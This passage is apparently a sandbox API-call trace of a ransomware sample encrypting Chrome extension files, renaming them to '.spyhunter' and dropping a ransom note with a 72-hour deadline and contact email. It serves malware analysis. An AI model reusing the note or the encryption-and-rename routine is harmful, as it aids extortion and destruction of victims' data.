lpNumberOfBytesWritten=0x57ea7c*=0x269, lpOverlapped=0x0) returned 1 [0159.892] GetProcessHeap () returned 0x2c0000 [0159.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.892] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.892] WriteFile (in: hFile=0xa0, lpBuffer=0x57eabc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea7c, lpOverlapped=0x0 | out: lpBuffer=0x57eabc*, lpNumberOfBytesWritten=0x57ea7c*=0x4, lpOverlapped=0x0) returned 1 [0159.892] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea7c*=0x30, lpOverlapped=0x0) returned 1 [0159.892] CloseHandle (hObject=0xa0) returned 1 [0159.892] GetProcessHeap () returned 0x2c0000 [0159.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.892] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.spyhunter") returned 169 [0159.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0159.893] GetProcessHeap () returned 0x2c0000 [0159.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.893] GetProcessHeap () returned 0x2c0000 [0159.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.893] GetProcessHeap () returned 0x2c0000 [0159.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f804f8 | out: hHeap=0x2c0000) returned 1 [0159.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.895] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.895] WriteFile (in: hFile=0xa0, lpBuffer=0x57e9f3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb1c, lpOverlapped=0x0 | out: lpBuffer=0x57e9f3*, lpNumberOfBytesWritten=0x57eb1c*=0x127, lpOverlapped=0x0) returned 1 [0159.896] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.896] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb1c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.896] CloseHandle (hObject=0xa0) returned 1 [0159.899] GetProcessHeap () returned 0x2c0000 [0159.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1afe8 | out: hHeap=0x2c0000) returned 1 [0159.899] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eab8 | out: pbBuffer=0x57eab8) returned 1 [0159.899] GetProcessHeap () returned 0x2c0000 [0159.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.899] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eab0*=0x30) returned 1 [0159.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.903] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json") returned 159 [0159.903] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.903] GetProcessHeap () returned 0x2c0000 [0159.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.903] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea74*=0x2c4, lpOverlapped=0x0) returned 1 [0159.930] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.930] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x57ea74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ea74*=0x2c4, lpOverlapped=0x0) returned 1 [0159.930] GetProcessHeap () returned 0x2c0000 [0159.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.930] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.930] WriteFile (in: hFile=0xa0, lpBuffer=0x57eab4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea74, lpOverlapped=0x0 | out: lpBuffer=0x57eab4*, lpNumberOfBytesWritten=0x57ea74*=0x4, lpOverlapped=0x0) returned 1 [0159.931] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea74, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea74*=0x30, lpOverlapped=0x0) returned 1 [0159.931] CloseHandle (hObject=0xa0) returned 1 [0159.931] GetProcessHeap () returned 0x2c0000 [0159.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.931] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.spyhunter") returned 169 [0159.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0159.932] GetProcessHeap () returned 0x2c0000 [0159.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.932] GetProcessHeap () returned 0x2c0000 [0159.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.932] GetProcessHeap () returned 0x2c0000 [0159.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fa40 | out: hHeap=0x2c0000) returned 1 [0159.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.933] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.933] WriteFile (in: hFile=0xa0, lpBuffer=0x57e9eb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb14, lpOverlapped=0x0 | out: lpBuffer=0x57e9eb*, lpNumberOfBytesWritten=0x57eb14*=0x127, lpOverlapped=0x0) returned 1 [0159.934] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.934] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb14*=0x2ac, lpOverlapped=0x0) returned 1 [0159.935] CloseHandle (hObject=0xa0) returned 1 [0159.935] GetProcessHeap () returned 0x2c0000 [0159.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8120 | out: hHeap=0x2c0000) returned 1 [0159.935] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eab0 | out: pbBuffer=0x57eab0) returned 1 [0159.935] GetProcessHeap () returned 0x2c0000 [0159.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.935] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaa8*=0x30) returned 1 [0159.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.957] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0159.957] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.957] GetProcessHeap () returned 0x2c0000 [0159.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.957] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea6c*=0x29b, lpOverlapped=0x0) returned 1 [0159.976] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.976] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ea6c*=0x29b, lpOverlapped=0x0) returned 1 [0159.976] GetProcessHeap () returned 0x2c0000 [0159.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.976] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.976] WriteFile (in: hFile=0xa0, lpBuffer=0x57eaac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x57eaac*, lpNumberOfBytesWritten=0x57ea6c*=0x4, lpOverlapped=0x0) returned 1 [0159.977] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea6c*=0x30, lpOverlapped=0x0) returned 1 [0159.977] CloseHandle (hObject=0xa0) returned 1 [0159.977] GetProcessHeap () returned 0x2c0000 [0159.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.977] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.spyhunter") returned 173 [0159.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.spyhunter")) returned 1 [0159.978] GetProcessHeap () returned 0x2c0000 [0159.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.978] GetProcessHeap () returned 0x2c0000 [0159.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.978] GetProcessHeap () returned 0x2c0000 [0159.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a7f0 | out: hHeap=0x2c0000) returned 1 [0159.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eab0 | out: pbBuffer=0x57eab0) returned 1 [0159.978] GetProcessHeap () returned 0x2c0000 [0159.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eaa8*=0x30) returned 1 [0159.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.211] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json") returned 162 [0160.211] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0160.211] GetProcessHeap () returned 0x2c0000 [0160.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.211] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ea6c*=0x2800, lpOverlapped=0x0) returned 1 [0160.213] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.213] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ea6c*=0x2800, lpOverlapped=0x0) returned 1 [0160.213] GetProcessHeap () returned 0x2c0000 [0160.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.213] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.213] WriteFile (in: hFile=0xb0, lpBuffer=0x57eaac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x57eaac*, lpNumberOfBytesWritten=0x57ea6c*=0x4, lpOverlapped=0x0) returned 1 [0160.214] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea6c*=0x30, lpOverlapped=0x0) returned 1 [0160.214] CloseHandle (hObject=0xb0) returned 1 [0160.214] GetProcessHeap () returned 0x2c0000 [0160.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.215] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.spyhunter") returned 172 [0160.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0160.216] GetProcessHeap () returned 0x2c0000 [0160.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.216] GetProcessHeap () returned 0x2c0000 [0160.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.216] GetProcessHeap () returned 0x2c0000 [0160.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a658 | out: hHeap=0x2c0000) returned 1 [0160.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.217] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.217] WriteFile (in: hFile=0xb0, lpBuffer=0x57e9df*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb08, lpOverlapped=0x0 | out: lpBuffer=0x57e9df*, lpNumberOfBytesWritten=0x57eb08*=0x127, lpOverlapped=0x0) returned 1 [0160.218] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.218] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb08*=0x2ac, lpOverlapped=0x0) returned 1 [0160.218] CloseHandle (hObject=0xb0) returned 1 